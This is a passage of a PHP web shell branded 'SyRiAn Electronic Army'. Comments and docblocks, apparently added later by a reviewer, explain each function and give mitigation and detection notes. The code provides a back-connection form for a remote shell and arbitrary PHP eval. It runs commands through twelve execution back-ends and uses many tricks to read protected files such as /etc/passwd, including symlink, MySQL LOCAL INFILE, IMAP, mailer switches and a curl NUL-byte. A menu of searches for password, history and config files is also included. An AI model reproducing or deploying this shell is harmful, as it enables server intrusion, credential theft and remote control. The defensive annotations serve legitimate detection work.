  541.         <form method='POST' enctype="multipart/form-data">
  542.         <table width='100%' height='72' border='0' id='Box'>
  543.           <tr>
  544.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  545.                 <td style="background-color:#666;padding-left:10px;">Back Connection
  546.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  547.           </tr>
  548.             <tr>
  549.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  550.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  551.               <select name="CON_Type" >
  552.                 <option value="socks">SOCKS</option>
  553.                 <option value="fsockopen">FSOCKOPEN</option>
  554.               </select>
  555.               </td>
  556.             </tr>
  557.         </table>
  558.         </form>
  559.         <!-- End Of Commands Alias-->
  560.         </td>
  561.     </tr>
  562. </table>
  563. <?php
  // IncludeReader($path): the "include" entry of the Read Files menu.
  // Takes the file name after the last directory separator, sets include_path
  // to the part of $path that precedes it, and include()s the file name.
  // include() executes any PHP code in the target, so this is not a pure read.
  // The function has no return statement.
  564. function IncludeReader($path) {
  565.     global $os;
  566.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  567.     $fileName = substr(strrchr($path,$slash),1);
  568.     $includePath = substr($path,0,strpos($path,$fileName,0));
  569.     ini_set("include_path",$includePath);
  570.     include($fileName);
  571. }
  // GetUsers1(): returns whatever Exe('ls /var/mail') returns. Exe() is
  // defined outside this excerpt.
  // NOTE(review): presumably mailbox file names stand in for local account names - confirm.
  572. function GetUsers1() {
  573.     return Exe('ls /var/mail');
  574. }
  // GetUsers2(): returns an array holding the first colon-separated field
  // (the login name) of every line of /etc/passwd.
  575. function GetUsers2() {
  576.     $array = array();
  577.     $lines = file("/etc/passwd");
  578.     foreach($lines as $nr=>$val) {
  579.         $str = explode(":",$val);
  580.         array_push($array,$str[0]);
  581.     }
  582.     return $array;
  583. }
  // GetUsers3(): returns every directory entry of /home/ as an array
  // (readdir() also yields "." and ".."). When opendir() fails there is no
  // return statement, so the caller receives null.
  584. function GetUsers3() {
  585.     $array = array();
  586.     if ($dh = opendir("/home/"))  {
  587.         while (($file = readdir($dh)) !== false)  {
  588.             array_push($array,$file);
  589.         }
  590.         closedir($dh);
  591.         return $array;
  592.     }
  593. }
  // GetUsers4(): collects entry names through three nested readdir() loops
  // rooted at /home/ and returns them as an array. On each handle the first
  // readdir() result is read and discarded before the loop starts. The second
  // handle reopens /home/ itself, and the third opens $dir.$f.$f2 with no
  // separator between $f and $f2. Only the outer handle is closed. When the
  // outer opendir() fails the function returns null.
  594. function GetUsers4() {
  595.     $dir = "/home/";
  596.     $array = array();
  597.      if ($dh = opendir($dir)) {
  598.         $f = readdir($dh);
  599.         while (($f = readdir($dh)) !== false) {
  600.             $dh2=opendir($dir."/");
  601.             $f2 = readdir($dh2);
  602.             while (($f2 = readdir($dh2)) !== false) {
  603.                 $f2.="/";
  604.                 $dh3=opendir($dir.$f.$f2);
  605.                 $f3 = readdir($dh3);
  606.                 while (($f3 = readdir($dh3)) !== false) {
  607.                     array_push($array,$f3);
  608.                 }
  609.             }
  610.         }
  611.         closedir($dh);
  612.         return $array;
  613.      } 
  614. }
  // GetUsers5(): returns the resolved path of /etc/passwd from realpath(),
  // not the file's contents.
  615. function GetUsers5(){
  616.     return realpath('/etc/passwd');
  617. }
  // ErrorLog($path): the "error_log" entry of the Read Files menu.
  // Reads $path with file_get_contents(), appends the data to a scratch file
  // through error_log() message type 3, reads the scratch file back, deletes
  // it and returns the contents.
  // Forensic artefact: a short-lived file in the current directory named by
  // uniqid() (13 hexadecimal characters, no extension).
  // get_magic_quotes_gpc() was removed in PHP 8.0.
  618. function ErrorLog($path){
  619.     $tempFile = uniqid();
  620.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  621.     error_log(file_get_contents($path), 3, $tempFile);
  622.     $content = file_get_contents($tempFile);
  623.     unlink($tempFile);
  624.     return $content;   
  625. }
  // SymlinkF($path): the "symlink" entry of the Read Files menu.
  // Creates a symlink named by uniqid() that points at $path, reads the target
  // through the link, removes the link and returns the contents. Returns null
  // when symlink() is not available.
  // Mitigation: disable symlink following for served directories and keep the
  // web-server user from creating links inside them.
  626. function SymlinkF($path) {
  627.     $tempFile = uniqid();
  628.     if(function_exists('symlink')) {
  629.         symlink($path,$tempFile);
  630.         $content = file_get_contents($tempFile);
  631.         unlink($tempFile);
  632.         return $content;
  633.     }
  634. }
  // MySQLReader($path): the "mysql" entry of the Read Files menu.
  // Connects with the file-level $DBhost/$DBuser/$DBpass, creates database "a"
  // with table a.a, loads the file at $path into it with LOAD DATA LOCAL
  // INFILE, prints each row followed by a newline and drops the database.
  // Rows are printed rather than returned, and $path is concatenated into the
  // SQL text. Uses the mysql_* extension, which was removed in PHP 7.0.
  // Mitigation: disable LOCAL INFILE on client and server (local_infile=0,
  // mysqli.allow_local_infile=Off) and do not give web applications accounts
  // with CREATE/GRANT rights. Detection: short-lived databases named "a".
  635. function MySQLReader($path) {
  636.     global $DBhost,$DBuser,$DBpass;
  637.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  638.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  639.     mysql_query("CREATE DATABASE a");
  640.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  641.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  642.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  643.     $result = mysql_query("SELECT a FROM a.a");
  644.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  645.     mysql_query("DROP DATABASE a");
  646. }
  // MySQLIReader($path): the "mysqli" entry of the Read Files menu.
  // Creates database "a" and table a.a over a mysql_* connection, then opens a
  // mysqli connection with MYSQLI_OPT_LOCAL_INFILE enabled and registers r()
  // as the local-infile handler, so the file's bytes are printed while LOAD
  // DATA LOCAL INFILE reads them. Nothing is returned.
  // Unlike MySQLReader(), no DROP DATABASE is issued here, so a leftover
  // database named "a" is a possible forensic artefact.
  // Mitigation: keep LOCAL INFILE disabled (local_infile=0,
  // mysqli.allow_local_infile=Off).
  647. function MySQLIReader($path) {
  648.     global $DBhost,$DBuser,$DBpass;
  649.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  650.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  651.     mysql_query("CREATE DATABASE a");
  652.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  653.    
  // Infile handler: prints up to $len bytes from the stream; $buf and $err are
  // never written.
  654.     function r($fp, &$buf, $len, &$err) {
  655.       print fread($fp, $len);
  656.     }
  657.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  658.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  659.     $m->set_local_infile_handler("r");
  660.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  661.     $m->close();
  662. }
/**
 * Opens a persistent connection with the legacy mysql_* extension and
 * selects a database.
 *
 * On a failed connection the host, user name and password are echoed into
 * the response in clear text.
 *
 * @param string $host Database host.
 * @param string $user Account name.
 * @param string $pass Account password.
 * @param string $db   Database to select.
 * @return bool True when both steps succeed, false otherwise.
 */
function DBConnect($host,$user,$pass,$db) {
    $connect = mysql_pconnect($host,$user,$pass);
    if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
    else {
        $tryToSelectDB = mysql_select_db($db,$connect);
        if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
        // The second return is unreachable: callers receive true, never the link.
        else{return true; return $connect;}
    }
}
/**
 * Web-shell account enumeration: asks posix_getpwuid() for every uid from
 * 0 to 59999 and concatenates the returned fields, rebuilding the account
 * list without opening /etc/passwd.
 *
 * $path is never used. eah() is not a PHP builtin and is not defined in
 * the visible part of the file.
 *
 * Defender notes: where the posix extension is not needed by the
 * application, leaving it unloaded or listing posix_getpwuid in
 * disable_functions closes this enumeration path.
 *
 * @param string $path Unused.
 * @return string|null Concatenated passwd fields ($content is never
 *                     initialised, so null when nothing was appended).
 */
function ReadId($path) {
    for($uid=0;$uid<60000;$uid++) {  
        $ara = posix_getpwuid($uid);
        if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
        }
    }
    return $content;
}
/**
 * Web-shell file reader that hands $path to the IMAP extension as a
 * mailbox name and returns the body of message 1.
 *
 * NOTE(review): presumably relies on the IMAP client library opening a
 * local file as a mailbox outside PHP's own path restrictions - confirm
 * against the PHP/c-client version in use.
 *
 * Defender notes: do not load the imap extension on hosts that have no
 * need for it.
 *
 * @param string $path Mailbox specification (here: a file path).
 * @return string|false Body text of message number 1.
 */
function ImapF($path) {
    // Empty user name and password.
    $stream = imap_open($path, "", "");
    $str = imap_body($stream, 1);
    imap_close($stream);
    return $str;
}
/**
 * Web-shell file reader built on file(): joins every line of $path into
 * one string.
 *
 * @param string $path File to read.
 * @return string|null Joined contents; $content is never initialised, so
 *                     an empty file yields null.
 */
function FileF($path) {
    $lines = file($path); foreach($lines as $line){$content .= $line;}
    return $content;
}
/**
 * Web-shell file reader built on copy(): duplicates $path into a scratch
 * file in the working directory, reads the copy and deletes it.
 *
 * Defender notes: the scratch name is a 32-character hex string with a
 * ".bb" suffix; short-lived files of that shape in a web root are a
 * usable file-monitoring indicator.
 *
 * @param string $path File to read.
 * @return string|false Contents of the copy.
 */
function CopyF($path) {
    $tempFile = md5(uniqid()).".bb";
    copy($path,$tempFile);
    $content = file_get_contents($tempFile);
    unlink($tempFile);
    return $content;
}
/**
 * Intended as a line-by-line reader using fgetss().
 *
 * fgetss() expects an open stream handle, but receives the path string
 * here; the function was also removed in PHP 8.0.
 *
 * @param string $path File path (passed where a handle is expected).
 * @return string|null Accumulated lines; null when nothing was appended.
 */
function fgetssF($path) {
    while(($line = fgetss($path)) != false){$content .= $line;}
    return $content;
}
/**
 * Web-shell file reader built on highlight_file().
 *
 * Called without the second argument, highlight_file() prints the
 * syntax-highlighted source itself and returns a boolean, so the file's
 * contents reach the response as output rather than as a return value.
 *
 * @param string $path File to print.
 * @return bool Result of highlight_file().
 */
function highlightFile($path) {
    return highlight_file($path);
}
/**
 * Web-shell file reader that abuses the "additional parameters" argument
 * of mb_send_mail() to pass extra switches to the system mailer.
 *
 * NOTE(review): the -C switch presumably makes the mailer parse $path as
 * its configuration file and -X makes it log to the scratch file, so the
 * target's lines end up in that log - confirm for the installed MTA.
 *
 * Defender notes: alert on the mailer binary being started by the
 * web-server account with -C or -X, and list the mail functions in
 * disable_functions on hosts that do not send mail from PHP.
 *
 * @param string $path File to expose through the mailer log.
 * @return string|false|null Scratch-file contents, or null when
 *                           mb_send_mail() is unavailable.
 */
function mbSendEmail($path) {
    if(function_exists('mb_send_mail')) {
        $tempFile = uniqid();
        // $path is concatenated unquoted into the mailer's argument string.
        $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
        mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
        $content = file_get_contents($tempFile);
        unlink($tempFile);
        return $content;
    }
}
/**
 * Deletes a file with unlink() and, if that did not succeed, through a
 * shell command chosen by the global $os.
 *
 * The file name is interpolated unquoted into the "del" / "rm -f" command
 * line handed to Exe(). $delete stays undefined when unlink() is not
 * available.
 *
 * @param string $fileName File to remove.
 * @return bool True when $delete ended up truthy.
 */
function DeleteFile($fileName) {
    global $os;
    if(function_exists('unlink'))
    {$delete = unlink($fileName);}
    // Fallback: shell out through the shell's command dispatcher.
    if((!$delete) && ($os == 'Windows'))
    {$delete = Exe("del $fileName"); }
    else if((!$delete) && ($os == 'Linux'))
    {$delete = Exe("rm -f $fileName");}
    if($delete){return true;}else{return false;}
}
/**
 * Web-shell file reader that requests a file:// URL through cURL.
 *
 * The URL is $path, a NUL byte, then this script's own path.
 * NOTE(review): this looks like the historical NUL-byte trick against the
 * path check in old PHP curl builds - confirm against the PHP version.
 *
 * No CURLOPT_RETURNTRANSFER is set, so curl_exec() writes the body to the
 * response and var_dump() only prints the boolean result.
 *
 * Defender notes: patched PHP versions reject NUL bytes in URLs; do not
 * load the curl extension where the application does not need it.
 *
 * @param string $path File to request.
 * @return void
 */
function CurlFileRead($path) {
    $ch = curl_init("file://".$path."\x00".__FILE__);
    var_dump(curl_exec($ch));
}
/**
 * Opens $path read/write and reads it with fread().
 *
 * The escaped result is discarded (neither echoed nor returned), and
 * filesize() is given the file handle instead of a path.
 *
 * @param string $path File to open.
 * @return void
 */
function FReadF($path) {
    $file = fopen($path,'r+'); //Open The File
    if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
    fclose($file);
}
/**
 * Web-shell file reader that copies $path through the compress.zlib://
 * stream wrapper into a tempnam() file under the global $dir, then returns
 * the copy HTML-escaped with line breaks converted.
 *
 * $filename is never defined, so the first and last appends add nothing.
 * NOTE(review): the wrapper prefix is presumably there to sidestep path
 * checks that only apply to plain file paths - confirm.
 *
 * Defender notes: scratch files with a "cx" prefix created by the
 * web-server account are the on-disk trace of this routine.
 *
 * @param string $path File to read.
 * @return string|null Escaped contents, or null when the copy fails.
 */
function TempnameF($path) {
    global $dir;
    $temp = tempnam($dir, "cx");
    if(copy("compress.zlib://".$path, $temp)) {
        $handler = fopen($temp, "r");
        $readFile = fread($handler, @filesize($temp));
        fclose($handler);
        $content .= htmlspecialchars($filename);
        $content .= nl2br(htmlspecialchars($readFile));
        $content .= htmlspecialchars($filename);
        unlink($temp);
        return $content;
    }  
}
/**
 * Arbitrary PHP execution: strips PHP open/close tags from $eval and runs
 * the remainder with eval().
 *
 * Defender notes: eval is a language construct, so disable_functions
 * cannot switch it off; rely on preventing script upload and execution in
 * writable directories, and on static scanning for eval() applied to
 * request-derived data.
 *
 * @param string $eval PHP source to execute.
 * @return bool True only when the evaluated code itself returns a truthy
 *              value (eval() yields null otherwise).
 */
function Evaluation($eval) {
    $eval = str_replace(array("<?php","<?","?>"),"",$eval);
    $eval = eval($eval);
    if($eval){return true;}else{return false;}
}
  752. function Oracle() {
  753.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  754.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  755. }
  756. function MsSQL() {
  757.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  758.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  759. }
  760. function MySQL2() {
  761.     $mysql_try = function_exists('mysql_connect');
  762.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
  763.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  764. }
  765. function MSQL() {
  766.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  767.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  768. }
  769. function MysqlI() {
  770.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  771.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  772. }
  773. function Gzip() {
  774.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  775.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  776. }
  777. function openBaseDir() {
  778.     $openBaseDir = ini_get("open_basedir");
  779.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  780.     else {$openBaseDir = '<font color="red">ON</font>';}   
  781.     return $openBaseDir;
  782. }
  783. function Curl() {
  784.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  785.     else{$curl = '<font color="green">OFF</font>';}return $curl;
  786. }
  787. function magicQouts() {
  788.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  789.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  790.     else {$mag= '<font color="red">ON</font>';}return $mag;
  791. }
  792. function SafeMode() {
  793.     $safe_mode = ini_get("safe_mode");
  794.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  795.     else {$safe_mode = '<font color="red">ON</font>';}
  796.     return $safe_mode;
  797. }
  798. function DisableFunctions() {
  799.     $disfun = ini_get('disable_functions');
  800.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  801. }
  802. function RegisterGlobals() {
  803.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  804.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  805. }
/**
 * Picks a client address from the environment, preferring
 * HTTP_X_FORWARDED_FOR, then HTTP_CLIENT_IP, then REMOTE_ADDR.
 *
 * The variable names are written as bare constants rather than quoted
 * strings. The first two values come from request headers the client
 * controls, so the result is not a trustworthy source address; for
 * attribution use the connection address recorded by the web server.
 *
 * @return string|false Selected address value.
 */
function GetRealIP() {
    if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
    elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
    else {$ip=getenv(REMOTE_ADDR);}
    return $ip;
}
/**
 * Echoes the shell's drop-down of canned commands for the current platform.
 *
 * The parameter is immediately rebound to the global $os by the global
 * statement, so the value passed in is ignored. Choosing an entry triggers
 * the page's AddAlias() JavaScript handler.
 *
 * Defender notes: the option values are a ready-made list of discovery
 * activity to hunt for (account, network and service listing; SUID/SGID
 * and world-writable searches; searches for configuration, password and
 * history files). Any of these running as a child of the web-server or
 * PHP process is a high-signal process-lineage alert.
 *
 * @param string $os Ignored; the global $os decides which list is printed.
 * @return void Markup is echoed.
 */
function SelectCommand($os) {
    global $os;
    if($os == 'Windows') {
        echo "
        <select name='alias' id='alias' onChange='AddAlias();' >
        <option value=''>NONE</option> 
        <option value='dir' >List Directory</option>
        <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
        <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
        <option value='netstat -an'>Show active connections</option>
        <option value='net start'>Show running services</option>
        <option value='tasklist'>Show Pro</option>
        <option value='net user'>User accounts</option>
        <option value='net view'>Show computers</option>
        <option value='arp -a'>ARP Table</option>
        <option value='ipconfig /all'>IP Configuration</option>
        <option value='netstat -an'>netstat -an</option>
        <option value='systeminfo'>System Informations</option>
        <option value='getmac'>Get Mac Address</option>
        </select>
        ";
    }
    else {
        // Every non-Windows value of $os gets the Unix list.
        echo "
        <select name='alias' id='alias' onChange='AddAlias();' >
        <option value=''>NONE</option> 
        <option value='ls -la'>List dir</option>
        <option value='cat /etc/hosts'>IP Addresses</option>
        <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
        <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
        <option value='netstat -an | grep -i listen'>show opened ports</option>
        <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
        <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
        <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
        <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
        <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
        <option value='find / -type f -name \"config*\"'>find config* files</option>
        <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
        <option value='find / -perm -2 -ls'>find all writable folders and files</option>
        <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
        <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
        <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
        <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
        <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
        <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
        <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
        <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
        <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
        <option value='locate httpd.conf'>locate httpd.conf files</option>
        <option value='locate vhosts.conf'>locate vhosts.conf files</option>
        <option value='locate proftpd.conf'>locate proftpd.conf files</option>
        <option value='locate psybnc.conf'>locate psybnc.conf files</option>
        <option value='locate my.conf'>locate my.conf files</option>
        <option value='locate admin.php'>locate admin.php files</option>
        <option value='locate cfg.php'>locate cfg.php files</option>
        <option value='locate conf.php'>locate conf.php files</option>
        <option value='locate config.dat'>locate config.dat files</option>
        <option value='locate config.php'>locate config.php files</option>
        <option value='locate config.inc'>locate config.inc files</option>
        <option value='locate config.inc.php'>locate config.inc.php</option>
        <option value='locate config.default.php'>locate config.default.php files</option>
        <option value='locate config'>locate config* files </option>
        <option value='locate \".conf\"'>locate .conf files</option>
        <option value='locate \".pwd\"'>locate .pwd files</option>
        <option value='locate \".sql\"'>locate .sql files</option>
        <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
        <option value='locate \".bash_history\"'>locate .bash_history files</option>
        <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
        <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
        <option value='locate backup'>locate backup files</option>
        <option value='locate dump'>locate dump files</option>
        <option value='locate priv'>locate priv files</option>
        </select>
        ";
    }
}
/**
 * Builds the shell's inline stylesheet and client-side helper script.
 *
 * $sh3llColor is concatenated unescaped into the CSS as the accent colour.
 * The script block defines openPHPInfo(), AddAlias(), addUploadInput() and
 * change_dir_mode().
 *
 * Defender notes: the emitted markup carries stable strings that work as
 * content and log signatures for this shell - the query strings
 * "?info=getPhpInfo" and "?dir_mode=", the element ids "CMD_Line",
 * "alias", "uploadInput" and "dir_mode", and the upload field name
 * "uploadfile[]".
 *
 * @param string $sh3llColor CSS colour value used for links, borders and text.
 * @return string The <style> and <script> markup.
 */
function CSS($sh3llColor) {
    $css =  "
    <style>
    BODY
    {
        FONT-FAMILY: Verdana;
        margin: 2;
        background-color: #000000;
        color:white;
        font-size:10pt;
    }
    sy  
    {
        color:".$sh3llColor.";
        font-size:7pt;
    }
    #Box
    {
        color:".$sh3llColor.";
        background-color:#000;
        font-size:14px;
        font-weight:bold;

        border:none;
    }
    table
    {
        border:none;
        BORDER:  #eeeeee  outset;
        BACKGROUND-COLOR: #000000;
        color: #cccccc;
        font-size:10px;
    }
    tr
    {
        BORDER-RIGHT:  #cccccc 1px solid;
        BORDER-TOP:    #cccccc 1px solid;
        BORDER-LEFT:   #cccccc 1px solid;
        BORDER-BOTTOM: #cccccc 1px solid;
        color: #ffffff;
    }
    td
    {
        BORDER-RIGHT:  #cccccc 1px solid;
        BORDER-TOP:    #cccccc 1px solid;
        BORDER-LEFT:   #cccccc 1px solid;
        BORDER-BOTTOM: #cccccc 1px solid;
        color: #cccccc;
    }

    input
    {
        BORDER-RIGHT:  ".$sh3llColor." 1px solid;
        BORDER-TOP:    ".$sh3llColor." 1px solid;
        BORDER-LEFT:   ".$sh3llColor." 1px solid;
        BORDER-BOTTOM: ".$sh3llColor." 1px solid;
        BACKGROUND-COLOR: #333333;
        font: 9pt tahoma;
        color: #ffffff;
    }
    select
    {
        BORDER-RIGHT:  #ffffff 1px solid;
        BORDER-TOP:    #999999 1px solid;
        BORDER-LEFT:   #999999 1px solid;
        BORDER-BOTTOM: #ffffff 1px solid;
        BACKGROUND-COLOR: #000000;
        font: 9pt tahoma;
        color: #CCCCCC;;
    }
    submit
    {
        BORDER:  1px outset buttonhighlight;
        BACKGROUND-COLOR: #272727;
        width: 40%;
        color: #cccccc;
    }
    textarea
    {
        BORDER-RIGHT:  #ffffff 1px solid;
        BORDER-TOP:    #999999 1px solid;
        BORDER-LEFT:   #999999 1px solid;
        BORDER-BOTTOM: #ffffff 1px solid;
        BACKGROUND-COLOR: #333333;
        color: #ffffff;
    }
    .Save{
        width:500px;   
        border-color:red;
    }
    A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
    A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
    A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
    A:hover {color:blue;TEXT-DECORATION: none;}
    </style>
    <script>
    function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
    function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
    function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
    function change_dir_mode() {
        var dir_mode = document.getElementById('dir_mode').value;
        document.location = '?dir_mode='+dir_mode;
    }
    </script>
    ";
    return $css;
}
/**
 * Undoes magic-quotes escaping on a request value.
 *
 * Calls get_magic_quotes_gpc() without a function_exists() guard; that
 * function was removed in PHP 8.0, so every caller of this helper fails
 * there with a fatal error.
 *
 * @param string $string Raw request value.
 * @return string The value with slashes stripped when magic quotes are on,
 *                otherwise unchanged.
 */
function filter($string) {
    if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
    else{return $string;    }
}
/**
 * Echoes the shell's branded footer table and closes the HTML document.
 *
 * Defender notes: the banner text, the site link and the contact address
 * are fixed strings, which makes them usable content signatures when
 * scanning a web root or response bodies for this shell.
 *
 * @return void Markup is echoed; nothing is returned.
 */
function footer() {
    echo '
    <table width="100%">
    <tr>
    <td width="100%"><center>
    <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
    <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
    <sy>  ~~<< </sy>sea.coders@hotmail.com<sy> >>~~</sy></b>
    </center></td>
    </tr>
    </table>
    </body></html>
    ';
}
/**
 * Prints the drop-down that selects which execution back-end the shell
 * uses, pre-selecting the entry that matches the global $exec_method.
 *
 * The form field is named "exe_method". The Linux list offers eight
 * back-ends; every other platform gets twelve, adding the Windows-only
 * ones.
 *
 * Defender notes: a request parameter named exe_method carrying one of
 * these values is a useful web-log and WAF indicator for this shell.
 *
 * @return void Markup is written directly to the response.
 */
function print_exe_method() {
    global $os; global $exec_method;
    if($os == "Linux") {
        ?>
        <select name="exe_method" >
            <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
            <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
            <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
            <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
            <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
            <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
            <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
            <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
        </select>
        <?php
    } else {
        ?>
        <select name="exe_method" >
            <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
            <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
            <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
            <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
            <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
            <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
            <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
            <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
            <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
            <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
            <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
            <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
        </select>
        <?php
    }
}
/**
 * Central command dispatcher of the shell: runs $command through the
 * back-end named by the global $exec_method and echoes the output.
 *
 * Twelve back-ends are handled; an unrecognised $exec_method runs nothing.
 * The perl and python branches splice $command into a single-quoted
 * string of interpreter source.
 *
 * Defender notes: listing exec, system, shell_exec, passthru, proc_open
 * and popen in disable_functions removes the first six branches, and the
 * remaining ones depend on optional extensions that a production host
 * normally has no reason to load. Independently of PHP settings, alert on
 * the web-server or PHP process spawning a command interpreter.
 *
 * @param string $command Command line to run.
 * @return void Output is echoed; no value is returned.
 */
function Exe($command) {
    global $dir;global $os;global $exec_method;
    // Strips magic-quotes escaping so the command reaches the shell verbatim.
    $command = filter($command);
   
    if($exec_method == "exec") {
        exec($command,$output);echo join("\n",$output);
    } else if($exec_method == "system") {
        system($command);
    } else if($exec_method == "shell_exec") {
        echo shell_exec($command);
    } else if($exec_method == "passthru") {
        passthru($command);
    } else if($exec_method == "proc_open") {
        echo proc_exec($command,$dir);
    } else if($exec_method == "popen") {
        // convert_cyr_string() was removed in PHP 8.0.
        $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
    } else if($exec_method == "win_shell_execute") {
        echo winshell($command);
    } else if($exec_method == "win32_create_service") {
        echo srvshell($command);
    } else if($exec_method == "ffi") {
        echo ffishell($command);
    } else if($exec_method == "perl") {
        echo perlshell($command);
    } else if($exec_method == "python") {
        echo python_eval("import os\nos.system('".$command."')");
    } else if($exec_method == "slash_bypass") {
        echo slashBypass($command);
    }
}
/**
 * Runs a command with proc_open() in working directory $dir and returns
 * what it wrote to descriptor 1.
 *
